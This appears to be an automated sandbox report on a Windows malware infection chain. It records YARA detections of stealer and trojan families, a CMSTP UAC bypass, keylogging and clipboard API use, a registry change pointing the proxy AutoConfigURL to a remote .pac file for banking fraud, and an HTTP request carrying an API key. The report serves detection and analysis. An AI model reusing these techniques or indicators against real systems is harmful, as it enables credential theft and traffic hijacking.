                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.ebudy.com.0.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.facedome.facebook.net equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.fedora.mirror.facebook.net equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.goalmaximesaj.com.0.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.google.0.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.graph.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.login.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.m.0.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.mirror.facebook.net equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.new.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.php.mirror.facebook.net equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.presto.vip.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.proxygen-verifier.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.s-static.ak.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.sims.vvv.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.static.ak.connect.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.symsrv.vip.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.telkomsel.com.0.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.turkcell-imbenim.0.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.turkcelluygulamalar.com.0.facebook.com equals www.facebook.com (Facebook)
                Source: FagLhQ.tmp, 00000016.00000002.43364362330.000000000018F000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: www.vodafone.com.0.facebook.com equals www.facebook.com (Facebook)
                Source: unknownHTTP traffic detected: POST /telemetry?source=installer&env=prod HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: InnoSetupx-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrofContent-Length: 477Host: api.joinmassive.com
                Source: unknownHTTPS traffic detected: 172.67.68.80:443 -> 192.168.11.20:49835 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.25.158:443 -> 192.168.11.20:49837 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.32.99.56:443 -> 192.168.11.20:49838 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.79.157.152:443 -> 192.168.11.20:49839 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.11.20:49841 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.11.20:49842 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 188.72.236.239:443 -> 192.168.11.20:49847 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ECA321 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,13_2_00ECA321
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EDF358 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,13_2_00EDF358
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EDF358 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,13_2_00EDF358
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EF9D97 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,13_2_00EF9D97
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00EF9D97 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_00EF9D97

                E-Banking Fraud

                barindex
                Source: C:\Windows\System32\svchost.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings AutoConfigURL http://34.80.59.191/win.pac

                System Summary

                barindex
                Source: 40.2.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 40.2.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 35.0.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 35.0.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 35.2.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 35.2.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 37.0.DMLnyt.dc0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 37.0.DMLnyt.dc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 37.0.DMLnyt.dc0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 37.2.DMLnyt.dc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 38.2.svchost.exe.19809ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 38.2.svchost.exe.19809ad0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 40.0.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 40.0.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 37.0.DMLnyt.dc0000.4.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 34.2.rundll32.exe.3440000.0.unpack, type: UNPACKEDPEMatched rule: Detects Fabookie / ElysiumStealer Author: ditekSHen
                Source: 34.2.rundll32.exe.3440000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 34.2.rundll32.exe.3440000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 37.0.DMLnyt.dc0000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 37.0.DMLnyt.dc0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 40.2.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 40.2.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 38.2.svchost.exe.19809ad0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 38.2.svchost.exe.19809ad0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 35.2.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 35.2.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 35.0.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 35.0.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 40.0.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
                Source: 40.0.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 00000022.00000002.42906398248.0000000003484000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 00000028.00000003.42858002035.000001F19B2C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 00000023.00000003.42828619711.000002546F000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 00000026.00000002.47256793876.0000019809780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 00000022.00000002.42904144469.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Fabookie / ElysiumStealer Author: ditekSHen
                Source: 00000022.00000002.42904144469.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 00000023.00000002.47258097025.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
                Source: 00000023.00000002.47258097025.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 00000028.00000002.43311174793.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
                Source: 00000028.00000002.43311174793.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 00000023.00000000.42836378036.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
                Source: 00000023.00000000.42836378036.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 00000028.00000000.42868569534.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
                Source: 00000028.00000000.42868569534.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: 00000026.00000002.47264376081.0000019809AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Chebka Author: ditekSHen
                Source: 00000026.00000002.47264376081.0000019809AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\mp3studios_6[1].exe, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnyt, type: DROPPEDMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: Yara matchFile source: 40.2.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.0.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.svchost.exe.2546f070000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.svchost.exe.19809ad0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.svchost.exe.1f19b330000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 34.2.rundll32.exe.3440000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.2.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 38.2.svchost.exe.19809ad0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.2.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 35.0.svchost.exe.2546f070000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 40.0.svchost.exe.1f19b330000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000022.00000002.42906398248.0000000003484000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000003.42858002035.000001F19B2C0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.42828619711.000002546F000000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.47256793876.0000019809780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000022.00000002.42904144469.00000000033A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.47258097025.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000002.43311174793.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000000.42836378036.000002546F070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000028.00000000.42868569534.000001F19B330000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000026.00000002.47264376081.0000019809AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7288, type: MEMORYSTR
                Source: jame001[1].exe.20.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: EfRhfn.20.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: EfRhfn.exe.29.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: WyFBnl.20.drStatic PE information: .vmp0 and .vmp1 section names
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 480 -p 7960 -ip 7960
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00403B8E1_2_00403B8E
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00405C501_2_00405C50
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E7C0BE13_2_00E7C0BE
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E681B013_2_00E681B0
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E821B213_2_00E821B2
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E9A16E13_2_00E9A16E
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EEC69D13_2_00EEC69D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E9E78013_2_00E9E780
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED281013_2_00ED2810
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E969EB13_2_00E969EB
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EC893613_2_00EC8936
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E68AB013_2_00E68AB0
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E8CD2013_2_00E8CD20
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E7CE1513_2_00E7CE15
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EF50DA13_2_00EF50DA
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E6D06013_2_00E6D060
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E9705913_2_00E97059
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E8161413_2_00E81614
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E8198613_2_00E81986
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E87A9B13_2_00E87A9B
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E7DBDE13_2_00E7DBDE
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E79B7D13_2_00E79B7D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E87CCA13_2_00E87CCA
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E81C3013_2_00E81C30
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E81EF713_2_00E81EF7
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E87F2713_2_00E87F27
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E681B019_2_00E681B0
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E821B219_2_00E821B2
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E9A16E19_2_00E9A16E
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00EEC69D19_2_00EEC69D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E9E78019_2_00E9E780
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED281019_2_00ED2810
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E969EB19_2_00E969EB
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00EC893619_2_00EC8936
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E68AB019_2_00E68AB0
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E8CD2019_2_00E8CD20
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00EF50DA19_2_00EF50DA
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E6D06019_2_00E6D060
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E9705919_2_00E97059
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E8161419_2_00E81614
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E8198619_2_00E81986
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E87A9B19_2_00E87A9B
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E7DBDE19_2_00E7DBDE
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E79B7D19_2_00E79B7D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E87CCA19_2_00E87CCA
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E81C3019_2_00E81C30
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E81EF719_2_00E81EF7
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E7BF5119_2_00E7BF51
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E87F2719_2_00E87F27
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EC188B LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,13_2_00EC188B
                Source: l39HA25qjw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Fuck.exe.pif.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Fuck.exe.pif.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Fuck.exe.pif.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Fuck.exe.pif.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Fuck.exe.pif.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: Fuck.exe.pif.7.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: AdblockInstaller[1].exe.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: FagLhQ.20.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: FagLhQ.tmp.21.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: FagLhQ.tmp.21.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: is-03UQT.tmp.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: is-03UQT.tmp.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: is-UM4C0.tmp.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: is-THGP9.tmp.22.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                Source: C:\Users\user\Desktop\l39HA25qjw.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\findstr.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\qymasQHsquYhjAFGoa\FagLhQSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\ZMozrHwlcUivWMjcwg\WyFBnlSection loaded: edgegdi.dll
                Source: C:\Users\user\AppData\Local\Temp\zamzGuUAZjRRZhjPeC\MpVMRrSection loaded: edgegdi.dll
                Source: C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfnSection loaded: edgegdi.dll
                Source: C:\Users\user\AppData\Local\Temp\is-A3Q0E.tmp\vc_redist.x64.exeSection loaded: edgegdi.dll
                Source: C:\Windows\Temp\{AC1CDB68-D92A-427E-A09B-9742E51C62BE}\.cr\vc_redist.x64.exeSection loaded: edgegdi.dll
                Source: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exeSection loaded: edgegdi.dll
                Source: C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exeSection loaded: tsappcmp.dll
                Source: C:\Users\user\AppData\Local\Temp\BmJXgWaKpkcZyvlBVT\DMLnytSection loaded: edgegdi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dll
